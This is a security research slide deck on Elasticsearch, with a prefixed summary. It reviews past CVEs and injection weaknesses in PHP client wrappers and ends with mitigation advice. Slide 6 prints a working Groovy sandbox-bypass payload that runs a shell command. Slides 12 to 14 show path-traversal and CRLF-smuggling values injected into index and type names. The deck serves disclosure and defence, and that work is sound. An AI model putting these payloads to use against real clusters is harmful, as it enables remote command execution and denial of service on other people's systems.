Elasticsearch is a distributed RESTful search engine that is commonly used but has had security vulnerabilities in the past related to remote code execution and path traversal. The document examines potential injection vulnerabilities in how various Elasticsearch client wrappers in PHP handle user-supplied input, finding that the original PHP client properly URL-encodes dots in paths but other clients may be vulnerable if they do not sanitize input or properly construct JSON requests. It recommends input validation and use of client libraries' query parameterization features to help prevent injection attacks against Elasticsearch deployments.

1. ElasticSearch:
Is it secure?
@d0znpp
Wallarm research

2. What is ElasticSearch?
“Elasticsearch is a distributed RESTful search engine
built for the cloud.“
Official repo: https://github.com/elastic/elasticsearch
Distributed Lucene instances broker
● RESTful API
● Native Java API
Clients: https://www.elastic.co/guide/index.html

3. Previous works
● NoSQL Injection for Elasticsearch Kindle Edition by
Gary Drocella http://goo.gl/OnfMOz
=> ACL to 9200 and 9300
● NoSQL Injections: Moving Beyond 'or '1'='1'. Matt
Bromiley Derbycon 2014 http://goo.gl/UBh42h
=> do not produce JSON by strings concatenation
● Securing ElasticSearch http://goo.gl/Ik3023
=> Use Nginx to provide BasicAuth and other advices

5. Previous bugs: 5 CVE
https://www.elastic.co/community/security
● CVE-2015-4165 is not disclosed yet ;(
“All Elasticsearch versions from 1.0.0 to 1.5.2 are vulnerable to an
attack that uses Elasticsearch to modify files read and executed by
certain other applications.”
● CVE-2015-3337 path trav. https://goo.gl/YWwu3a
● CVE-2015-1427 Groovy RCE https://goo.gl/Bi9SfC
● CVE-2014-6439 CORS issue https://goo.gl/7kMxod
● CVE-2014-3120 Java RCE https://goo.gl/iZL5L8

6. Sandbox bypass 1427
{
"size":1,
"script_fields":{
"lupin":{
"script":"java.lang.Math.class.forName("java.lang.Runti
me").getRuntime().exec("id").getText()"
}
}
}

7. What is my point?
BugBounty
https://research.facebook.com/search?q=a%20 200
https://research.facebook.com/search?q=a%22 500
$1000 reward for injection into JSON to ElasticSearch
But it might be RCE...

8. What is my point?
● Want to hack it through web-applications
● Because it’s really rare case when ES is present at
network perimeter
● To check wrappers for different platforms for input
validation attacks
● Yes, the same as with Memcached injections
https://goo.gl/9qV620 [BHUS-14]

9. 4 popular clients (wrappers)
http://jolicode.com/blog/elasticsearch-php-clients-test-
drive
● Original (elasticsearch)
● Sherlock
● Elastica
● Nervetattoo
Let’s start from PHP

10. ● RESTful tricks (while user data at URL ../ et al.)
● JSON syntax breakers ( “ } { ] [ )
● Native Java API
● Filename tricks (each index is a folder with the same
name). I suggests that it is CVE-2015-4165 vector ;)
Input validation kinds

11. ● RESTful tricks (while user data at URL ../ et al.)
● JSON syntax breakers ( “ } { ] [ )
● Native Java API <- Only about RESTful clients now
● Filename tricks (each index is a folder with the same
name). I suggests that it is CVE-2015-4165 vector ;)
<- ES internals, not clients
Input validation kinds

12. ● All URI parts goes through PHP urlencode().
But dot (0x2e) IS NOT encoded by RFC
● json_encode protects from injections into values
$params = array();
$params['body'] = array('testField' => 'abc');
$params['index'] = '..';
$params['type'] = '_shutdown';
// Document will be indexed to my_index/my_type/<autogenerated_id>
$ret = $client->index($params);
elasticsearch original

13. ● URI parts “as is”
● json_encode protects from injections into values
$results = $es
->setIndex("what/../do/you/want!/")
->setType("and/../here/also!")
->search('title:cool&key=value&script_fields');//CVE
nervetattoo

14. But it’s a raw socket, baby!
$results = $es
->setIndex(" HTTP/1.1rn…”script”:”...”") // CVE
->setType("my_type")
->search('title:cool');
nervetattoo

15. ● Use DSL methods
● Index name and type are not for users
● Do not concatenate strings to JSON
● Always filter data before putting into wrappers
Conclusions

16. https://twitter.com/d0znpp
blog.wallarm.com
Thx!